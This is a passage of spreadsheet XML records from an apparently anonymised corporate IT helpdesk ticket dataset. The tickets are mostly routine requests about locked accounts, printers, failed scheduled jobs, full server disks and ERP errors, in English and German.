libcktnm_x000d__x000a_ hello,_x000d__x000a_gxuvbcpr libcktnm_x000d__x000a_ the folder i can't find anymore is named &quot;transportation markhtyet&quot; and it was just below &quot;transportation&quot; on_x000d__x000a_ one_x000d__x000a_dwfiykeo argtxmvcumar3_x000d__x000a_ he_x000d__x000a_ic_x000d__x000a_ website visitor has left the conversation_x000d__x000a_"/>
    <s v="gxuvbcpr libcktnm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delete the charm- 7000006672"/>
    <s v="delete the charm 8111117783 as the configuration is done already and it was issue in  the bex report. "/>
    <s v="rujteoza mcoswhju"/>
    <x v="37"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/22/2016 06:01:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/22/2016 06:01:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to login to citrix"/>
    <s v="unable to login to citrix"/>
    <s v="zthxyfpn ctsgrafo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit login \ypladjeu wzfryxav"/>
    <s v="probleme mit login \ypladjeu wzfryxav"/>
    <s v="ypladjeu wzfryxav"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit outlook \dtlmbcrx mwuateyx"/>
    <s v="probleme mit outlook \dtlmbcrx mwuateyx"/>
    <s v="dtlmbcrx mwuateyx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="drucker funktioniert nicht \puxsvfwr cwkjruni"/>
    <s v="drucker funktioniert nicht \puxsvfwr cwkjruni"/>
    <s v="puxsvfwr cwkjruni"/>
    <x v="24"/>
  </r>
  <r>
    <s v="confirmations in bls (beschichtungsleitstand) not transfered to EU_tool"/>
    <s v="location: germany, coating department cvd_x000d__x000a__x000d__x000a_example: batch 16721 (it happens regularly)_x000d__x000a__x000d__x000a_every order of 16721 miss the confirmation packing fhurakgsl mldufqov in EU_tool (german: packen zum beschichten) however it was confirmed in bls. usually confirmations done in bls are transfered automatically into EU_tool. production planner need to close these gaps now by manually confirming missing process steps. the incident has also impact on our performance indicators, as time for packing is not credited in the system. _x000d__x000a__x000d__x000a_batch 16721 is a current example. the issue arised already in the past. _x000d__x000a__x000d__x000a_"/>
    <s v="xsjqhdgp ymstzudl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="unable to open the order confirmation from the erp"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rslvwpnh.emkfpqiy@gmail.com_x000d__x000a__x000d__x000a_please find the snap shot of the screen._x000d__x000a__x000d__x000a_am unable to open the url : _x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1fc86.94db1ce0]_x000d__x000a__x000d__x000a_"/>
    <s v="rslvwpnh emkfpqiy"/>
    <x v="12"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="gmneclxj czqthmrs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system disk of server HostName_698 is full "/>
    <s v="_x000d__x000a__x000d__x000a_received from: fbyusmxz.kxvmcbly@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_system disk c: of server HostName_698 is full â€“ please check._x000d__x000a_it is the virtual center server._x000d__x000a_"/>
    <s v="fbyusmxz kxvmcbly"/>
    <x v="11"/>
  </r>
  <r>
    <s v="persÃ¶nliches laufwerk &quot;adelhmk&quot; nicht mehr verfÃ¼gbar nach servermigration"/>
    <s v="bitte scghhnellstmÃ¶glich persÃ¶nliches laufwerk &quot;adelhmk&quot; wiederherstellen. _x000d__x000a__x000d__x000a_personal drive &quot;adelhmk&quot; unavailable after server migration"/>
    <s v="wtxvqngf nxjivlmr"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/22/2016 04:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/22/2016 04:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="11"/>
  </r>
  <r>
    <s v="crm problems"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rugdyxqh.aqvocmuy@gmail.com_x000d__x000a__x000d__x000a_good day all_x000d__x000a__x000d__x000a_i am having problems with crm the system does not open and does not prompt for a password_x000d__x000a_seemor current month outlook does not appear on the screen_x000d__x000a__x000d__x000a_kind "/>
    <s v="rugdyxqh aqvocmuy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="when i double click on a production order in erp 11 reporting under md04 the distribution icon does not come up "/>
    <s v="i have no where to insert an amount to allow me to ship. i can be reached at "/>
    <s v="jyrzqhgt xwasiehc"/>
    <x v="44"/>
  </r>
  <r>
    <s v="drucker findet scan-adresse nicht"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fdqjsygx.aivdjqtr@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_beim scannen findet der drucker em 96 die voreingestellte adresse nicht._x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="fdqjsygx aivdjqtr"/>
    <x v="11"/>
  </r>
  <r>
    <s v="5 pos cannot be posed in miro as the same message"/>
    <s v="the attachements are each of  the 5 pos error message shown in miro. they cannot be posed in erp for same problem. please help settle them. "/>
    <s v="dizquolf hlykecxa"/>
    <x v="9"/>
  </r>
  <r>
    <s v="sound issue"/>
    <s v="sound not working "/>
    <s v="svdefgwl sgtmurfh"/>
    <x v="18"/>
  </r>
  <r>
    <s v="engineering_tool advance search-issue"/>
    <s v="_x000a__x000a_received from: sihtvocw.yspnqxgw@gmail.com_x000a__x000a_hello_x000a__x000a_we ran report with sales person name as atuldhy gurpthy. however we got below reports which are not matching to the user searched. kindly check:_x000a__x000a_[cid:image001.jpg@01d1fc7a.7d98a360]_x000a__x000a_[cid:image002.jpg@01d1fc7a.7d98a360]_x000a__x000a_best "/>
    <s v="sihtvocw yspnqxgw"/>
    <x v="25"/>
  </r>
  <r>
    <s v="telephony_software input issue--  enter one number or letter  output double when reply email in new telephony_software software"/>
    <s v="since telephony_software software upgrading , if  input a number or letter , it get double .the show is two duplicate numbers .for example, i enter &quot;3014377&quot;, shows as &quot;22990033226666&quot; .pls find attachment for printerscreen.please help to solve as soon as possible"/>
    <s v="hmutkgze ngilcqky"/>
    <x v="6"/>
  </r>
  <r>
    <s v="Ã¶ffnen von exel_anhÃ¤ngen ( 0043 664 4688892)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: soldfnbq.uhnbsvqd@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_ich kann keinen exel-anhang Ã¶ffnen, auch nicht wenn ich diesen speicher und dann Ã¶ffne._x000d__x000a_[cid:image001.png@01d1fc59.bf242140]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen/ best "/>
    <s v="soldfnbq uhnbsvqd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp and network access limitation"/>
    <s v="_x000a__x000a_received from: pzybmcqd.fxtemlyg@gmail.com_x000a__x000a_hello it,_x000a__x000a_various of our users are linked to the network but cannot log into erp or get onto the local network drive to access the files._x000a__x000a_do to however are linked on the network (they can use internet explorer )._x000a__x000a__x000a_like users: andthyerh_x000a_cvdebrc_x000a__x000a_vvmathkag_x000a__x000a__x000a_i with username: vanthyrdys can access every system without any issues_x000a__x000a__x000a__x000a_best "/>
    <s v="pzybmcqd fxtemlyg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 08/22/2016 03:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 08/22/2016 03:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="kpm not working"/>
    <s v="hours punched on task are not visible in kpm"/>
    <s v="mbkxwcav wsfvmpzg"/>
    <x v="25"/>
  </r>
  <r>
    <s v="ebhsm004: e:/ is now 91% utilized."/>
    <s v="e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over _x000d__x000a_ 85% space consumed. space available: 4.4 g"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v=" rqxsm004 : f:/ is now 96% utilized."/>
    <s v="f:\ label:dat2-rqxsm004 dc86ed35 on server: rqxsm004 is over _x000d__x000a_ 85% space consumed. space available: 2.8 g"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="1"/>
  </r>
  <r>
    <s v="HostName_30 : g:\ label:wsp e26ca13a is now 96% utilized."/>
    <s v="g:\ label:wsp e26ca13a on server: HostName_30 is over _x000d__x000a_ 85% space consumed. space available: 4.2 g"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="reset passwords for wvdxnkhf jirecvta using password_management_tool password reset."/>
    <s v="the"/>
    <s v="wvdxnkhf jirecvta"/>
    <x v="16"/>
  </r>
  <r>
    <s v="job Job_403 failed in job_scheduler at: 08/22/2016 03:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_403 failed in job_scheduler at: 08/22/2016 03:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="setup new laptop fÃ¼r roboworker \qidgvtwa qvbutayx"/>
    <s v="setup new laptop fÃ¼r roboworker \qidgvtwa qvbutayx"/>
    <s v="qidgvtwa qvbutayx"/>
    <x v="24"/>
  </r>
  <r>
    <s v="bad printing quality at rn33"/>
    <s v="_x000a__x000a_received from: yfmaqovp.wdonhbez@gmail.com_x000a__x000a_hello,_x000a__x000a_we use our printer rn33 (germany fm) for printing of production papers and drawings in one step._x000a_at the moment we have a very bad quality on the drawings and production papers._x000a__x000a_we changed the toner. the toner is the original hp same as the printer._x000a_our it (tewgersy tgryudf) checked the printer also. regarding his checking the printer works correct._x000a_we did uacyltoe hxgaycze print from word -&gt; good quality._x000a_uacyltoe hxgaycze print form erp -&gt; bad quality._x000a__x000a_regarding his suggestions should we check the print paramdntyeters of erp._x000a_could you recheck this please?_x000a_was there a change?_x000a_"/>
    <s v="yfmaqovp wdonhbez"/>
    <x v="32"/>
  </r>
  <r>
    <s v="setup new ws \sqlmtixr urhbvfgd"/>
    <s v="setup new ws \sqlmtixr urhbvfgd"/>
    <s v="sqlmtixr urhbvfgd"/>
    <x v="24"/>
  </r>
  <r>
    <s v="awysv004 esxi host down"/>
    <s v="_x000d__x000a_c:\users\virakv&gt;ping awysv004_x000d__x000a__x000d__x000a_pinging awysv004.company.com [10.38.20.34] with 32 bytes of data:_x000d__x000a_request timed out._x000d__x000a_request timed out._x000d__x000a_request timed out._x000d__x000a_request timed out._x000d__x000a__x000d__x000a_ping statistics for 10.38.20.34:_x000d__x000a_    packets: sent = 4, received = 0, lost = 4 (100% loss),_x000d__x000a_"/>
    <s v="tkbuhcnq kdheauqo"/>
    <x v="11"/>
  </r>
  <r>
    <s v="mb5b download"/>
    <s v="_x000d__x000a__x000d__x000a_received from: azovgeck.zuwnxdbt@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i had construct with mb5b in erp a layout (display options) with the name &quot;mb5b richthammer&quot;. since today i canÂ´t choose this layout anymore. only one layout i could collect, but itÂ´s not one i had created._x000d__x000a__x000d__x000a_[cid:image004.jpg@01d1fc51.adaef550]_x000d__x000a__x000d__x000a_the layout should look like this:_x000d__x000a_[cid:image010.jpg@01d1fc4a.3f592000]_x000d__x000a__x000d__x000a_but at the moment it look like this:_x000d__x000a_[cid:image012.jpg@01d1fc4a.3f592000]_x000d__x000a__x000d__x000a_can you please help me to get the layout â€žmb5b richthammer&quot; back?_x000d__x000a_"/>
    <s v="azovgeck zuwnxdbt"/>
    <x v="29"/>
  </r>
  <r>
    <s v="job Job_1390 failed in job_scheduler at: 08/22/2016 02:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1390 failed in job_scheduler at: 08/22/2016 02:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="data backup profile update"/>
    <s v="help to update the profile and data backup from old pc to new pc"/>
    <s v="vwaliogd dviwuzhm"/>
    <x v="18"/>
  </r>
  <r>
    <s v="bildschirm im rÃ¼ckmeldeterminal 6 (gegenÃ¼ber kln-reinigungsanlage) defekt."/>
    <s v="bildschirm im rÃ¼ckmeldeterminal 6 (gegenÃ¼ber kln-reinigungsanlage) defekt."/>
    <s v="frzjtmyk wzacvhki"/>
    <x v="32"/>
  </r>
  <r>
    <s v="customer master"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rgtarthi.erjgypa@company.com_x000d__x000a__x000d__x000a_hello help,_x000d__x000a__x000d__x000a_-customer-master india -customer-master.india@company.com&lt;mailto:-customer-master.india@company.com&gt; â€“ is not getting updated with lauacyltoe hxgaycze mail since morning._x000d__x000a__x000d__x000a_[cid:image001.png@01d1fc64.17e6b5e0]_x000d__x000a__x000d__x000a_"/>
    <s v="xqoljzbh aydcwkxt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/22/2016 02:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/22/2016 02:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="carcau michthey  my password expires in 1 day"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vlcexqpg.vjrtqobx@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a__x000d__x000a_when i use the login _x000d__x000a_would you be so kind to help me ?_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="vlcexqpg vjrtqobx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="tablet - dell 7350 - windowsç³»ç»Ÿå¯åŠ¨åŽé»‘å±ã€‚"/>
    <s v="please provide details of the issue._x000d__x000a_windowsç³»ç»Ÿå¯åŠ¨åŽé»‘å±ã€‚"/>
    <s v="hymjicru ckrxqfes"/>
    <x v="31"/>
  </r>
  <r>
    <s v="please add office printer in my new laptop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qrnusygw.amiebrlf@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_please add the office printer (which is connected with company vpn) in my new laptop._x000d__x000a__x000d__x000a_"/>
    <s v="qrnusygw amiebrlf"/>
    <x v="18"/>
  </r>
  <r>
    <s v="vvthuenka"/>
    <s v="_x000a__x000a_received from: aksthyuhath.shettythruy@company.com_x000a__x000a_hi,_x000a__x000a_mr. ofuhdesi rhbsawmf is not able to login ess portal. please reset the password and share it with his manager._x000a__x000a_emp no_x000a__x000a_name_x000a__x000a_useid_x000a__x000a_manager_x000a__x000a_20245767_x000a__x000a_ofuhdesi rhbsawmf_x000a__x000a_vvthuenka_x000a__x000a_ebkfwhgt flapokym_x000a__x000a__x000a__x000a__x000a_with "/>
    <s v="badnzyue nxuqmdwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool java doesn't work"/>
    <s v="hr_tool java doesn't work"/>
    <s v="pwksivmq dbxajims"/>
    <x v="31"/>
  </r>
  <r>
    <s v="wegen file-server austausch kein zugriff auf datenbank mÃ¶glich!!  "/>
    <s v="wegen file-server austausch kein zugriff auf datenbank mÃ¶glich!!  eemw8144361; eemw8144255; eemw8144362 bitte hr. sudghnthdra mit kontaktieren. eilig!!!!"/>
    <s v="tiefszyh sfujdlgv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="kein zugriff von abteilung ce abstech eemw8144218 auf  datenbanken: betap_profil, betapdachform, betapfasen"/>
    <s v="kein zugriff von abteilung ce abstech eemw8144218 auf  datenbanken: betap_profil, betapdachform, betapfasen.  kontakt: sudghnthdra"/>
    <s v="djilqgmw bidchqsg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="password changes"/>
    <s v="_x000d__x000a__x000d__x000a_received from: brhlcpqv.sfozwkyx@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_could you please help me on unlocking the erp? it is blocked for entering wrong password._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="brhlcpqv sfozwkyx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1148 failed in job_scheduler at: 08/22/2016 01:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1148 failed in job_scheduler at: 08/22/2016 01:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="56"/>
  </r>
  <r>
    <s v="am not able to open any dash bankrd and hr_tool site through link web link"/>
    <s v="am not able to open any dash bankrd and hr_tool site through link web link can you kindly check "/>
    <s v="uwoqzmah jrzslmaf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="gdnshtzv lqrygnob"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open permission protected mails"/>
    <s v="unable to open permission protected mails"/>
    <s v="cqargubj krdxbfqh"/>
    <x v="18"/>
  </r>
  <r>
    <s v="kpm time sheet is not submitting. please resolve this issue as soon as possible."/>
    <s v="employee id-210667827"/>
    <s v="kdfnaytr pudqfmtc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp miro cannot pose the two pos with error message like the attachment"/>
    <s v="as the two attachment shown, when i pose this two po items, erp give the error message says the profit center is different. so i can't pose ir in miro now. please help settle them. "/>
    <s v="dizquolf hlykecxa"/>
    <x v="9"/>
  </r>
  <r>
    <s v="can not do z_chk for t/o# 606627 with dn 8057978066"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_we use z_chk want to confirm mm 4152195,but erp shows below error, pls help to check &amp; fix, "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rgtarthi.erjgypa@company.com_x000d__x000a__x000d__x000a_hi help,_x000d__x000a__x000d__x000a_i have changed the password today, except for the below._x000d__x000a_please help me change for SID_39 too._x000d__x000a__x000d__x000a_[cid:image001.png@01d1fc51.825a46c0]help_x000d__x000a__x000d__x000a_"/>
    <s v="xqoljzbh aydcwkxt"/>
    <x v="19"/>
  </r>
  <r>
    <s v="need to be able to create pr under xzn004 and xzs012."/>
    <s v="i used to be able to create pr for cost center xzn004 and xzs012, but now it does not worl. could you pls help to find out why? it shows &quot;purchaising accross comapny is not allowed.&quot;"/>
    <s v="ckitashy dnqojbwi"/>
    <x v="29"/>
  </r>
  <r>
    <s v="engineering tool not working."/>
    <s v="my engineering tool shows a error message as &quot;dataservices::taskmgr.getassignments() transaction (process id 413) was deadlocked on lock | communication buffer resources with another process and has been chosen as the deadlock victim. rerun the transaction&quot;._x000d__x000a__x000d__x000a_please help."/>
    <s v="xwcpkysq jydxhczm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password expired "/>
    <s v="windows password expired "/>
    <s v="olevkypn vogiadqs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked"/>
    <s v="windows account locked"/>
    <s v="ihlguasz agnwcqiz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/21/2016 22:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/21/2016 22:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="apps"/>
    <s v="_x000d__x000a__x000d__x000a_received from: anpocezt.qturbxsg@gmail.com_x000d__x000a__x000d__x000a_hello what apps should we be using on out phone. (iphone 6)_x000d__x000a_skype or business skype.  collaboration_platform or business collaboration_platform and should back our phone on icloud, collaboration_platform or our computer._x000d__x000a__x000d__x000a_best "/>
    <s v="anpocezt qturbxsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/21/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/21/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="11"/>
  </r>
  <r>
    <s v="tablet - dell 7350 - windows 8.1 ç³»ç»Ÿè¢«è¿˜åŽŸ. è´¦å·ä¸èƒ½ç™»å½•ç³»ç»Ÿã€‚"/>
    <s v="please provide details of the issue._x000d__x000a_ windows 8.1 ç³»ç»Ÿè¢«è¿˜åŽŸ. è´¦å·æ— æ³•ç™»å½•ç³»ç»Ÿã€‚"/>
    <s v="ybjgecfx nxzuseac"/>
    <x v="31"/>
  </r>
  <r>
    <s v="ess login issue."/>
    <s v="ess login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and reset the password.._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="pxfgoniv qhpkebgt"/>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vxlymbpz tysnumva"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_594 failed in job_scheduler at: 08/21/2016 17:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_594 failed in job_scheduler at: 08/21/2016 17:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1306 failed in job_scheduler at: 08/21/2016 15:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1306 failed in job_scheduler at: 08/21/2016 15:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="usa:dnb-vpn-rtr(10.38.1.11) is down since 8:39 pm on 08/20 et"/>
    <s v="usa: dnb-vpn-rtr(10.38.1.11) is down since 8:39 pm on 08/20 et.router went down during the sup engine replacement activity as per chg1144844._x000d__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="gigabitethernet1/0/14 on company-eu-deu-ds-germany-edksw002-2960-stack-sw002.company.com  connected to ap company_de_germany_aSID_78"/>
    <s v="gigabitethernet1/0/14 on company-eu-deu-ds-germany-edksw002-2960-stack-sw002.company.com  connected to ap company_de_germany_aSID_78  is flapping._x000d__x000a_attached monitoring_engineering_tool."/>
    <s v="jloygrwh acvztedi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="HostName_979(plm wwi uacyltoe hxgaycze):wwisvc.exe: wrong number of instances of process wwisvc.exe, expected instances gte 2 but found 0"/>
    <s v="HostName_979(plm wwi uacyltoe hxgaycze):wwisvc.exe: wrong number of instances of process wwisvc.exe, expected instances gte 2 but found 0"/>
    <s v="jloygrwh acvztedi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job snp_heu_5_regen failed in job_scheduler at: 08/21/2016 13:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_5_regen failed in job_scheduler at: 08/21/2016 13:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job bwhrattr failed in job_scheduler at: 08/21/2016 09:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bwhrattr failed in job_scheduler at: 08/21/2016 09:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/21/2016 09:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/21/2016 09:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_511 failed in job_scheduler at: 08/21/2016 08:58:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_511 failed in job_scheduler at: 08/21/2016 08:58:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_511 failed in job_scheduler at: 08/21/2016 08:47:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_511 failed in job_scheduler at: 08/21/2016 08:47:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="Israel, israel - (company):company-eu-isr--mainswitch-b-3560-access-sw02 is down since at 07:38 am et on 21-08-2016."/>
    <s v="EMEA, israel - (company):company-eu-isr--mainswitch-b-3560-access-sw02 is down since at 07:38 am et on 21-08-2016."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job snp_heu_1_regen failed in job_scheduler at: 08/21/2016 06:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_1_regen failed in job_scheduler at: 08/21/2016 06:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="india india kirty : interface: gigabitethernet2/0/48 on company-ap-ind-kirty-pu3-2960s-stack-sw01 is down."/>
    <s v="india india kirty : interface: gigabitethernet2/0/48 uplink to core 4503 admin switch on company-ap-ind-kirty-pu3-2960s-stack-sw01 is down"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="3"/>
  </r>
  <r>
    <s v="job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 08/21/2016 00:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 08/21/2016 00:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="no connection to t drive in na"/>
    <s v="_x000a__x000a_received from: blktuiae.jzakfmhw@gmail.com_x000a__x000a_dear it_x000a__x000a_is there any issue with the t drive in na_x000a__x000a_cannot get any connection_x000a__x000a_other drives in eu are running well_x000a__x000a_[cid:image001.png@01d1fb72.104f21c0]_x000a__x000a__x000a__x000a_gÃ¼nter webfnhtyer_x000a_manager  sourcing_x000a_blktuiae.jzakfmhw@gmail.com&lt;mailto:blktuiae.jzakfmhw@gmail.com&gt;_x000a__x000a__x000a_company shared services gmbh_x000a_geschÃ¤ftsfÃ¼hrer:  phvkowml azbtkqwx, naruedlk mpvhakdq"/>
    <s v="blktuiae jzakfmhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="weekly reboot of csqe prod servers "/>
    <s v="weekly reboot of csqe prod servers _x000d__x000a__x000d__x000a_HostName_1027_x000d__x000a_HostName_1028_x000d__x000a_"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_768:chkdsk is still running after the monthy reboot"/>
    <s v="after the monthly reboot of HostName_768 chkdsk is running from around 6:40 pm on 08/20 et._x000d__x000a_currently chkdsk is verifying files (stage 1 of 3) with 9 percent complete."/>
    <s v="jloygrwh acvztedi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="company-ap-chn-apac-company-psf-2960s-access-sw01.company.com (50.36.05.137 ) is down since 6:51 pm on 8/20 et"/>
    <s v="company-ap-chn-apac-company-psf-2960s-access-sw01.company.com (50.36.05.137 ) is down since 6:51 pm on 8/20 et"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ess login issue"/>
    <s v="ess login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and reset the password_x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that she was able to login._x000d__x000a_-issue resolved."/>
    <s v="qjfgkvln wzbngayp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user unable to login to erp."/>
    <s v="user unable to login to erp."/>
    <s v="skrxopnw zjasxphv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_30(sms &amp; sep server-company-india india):volume: g:\ label:wsp e26ca13a on server: HostName_30 is over 85% space co"/>
    <s v="observing below alert in monitoring_tool since 3:52 pm on 08/20 et.monitoring_engineering_tool attached._x000d__x000a_volume: g:\ label:wsp e26ca13a on server: HostName_30 is over 85% space consumed. space available: 4.2 g "/>
    <s v="jloygrwh acvztedi"/>
    <x v="65"/>
  </r>
  <r>
    <s v="germany vrtx HostName_597 down / urgent"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ecwtrjnq.jpecxuty@gmail.com_x000d__x000a__x000d__x000a_dear colleagues,_x000d__x000a__x000d__x000a_all virtual servers in germany / germany are down after the move of HostName_597 / vrtx system._x000d__x000a__x000d__x000a_we are urgently missing the virtual servers HostName_598 ( fileserver ) and efdsm009 ( printserver )_x000d__x000a__x000d__x000a_server team, would you please be so kind and start the virtual servers on HostName_604 and HostName_605._x000d__x000a__x000d__x000a_many "/>
    <s v="ecwtrjnq jpecxuty"/>
    <x v="11"/>
  </r>
  <r>
    <s v="mtd revenue detail report"/>
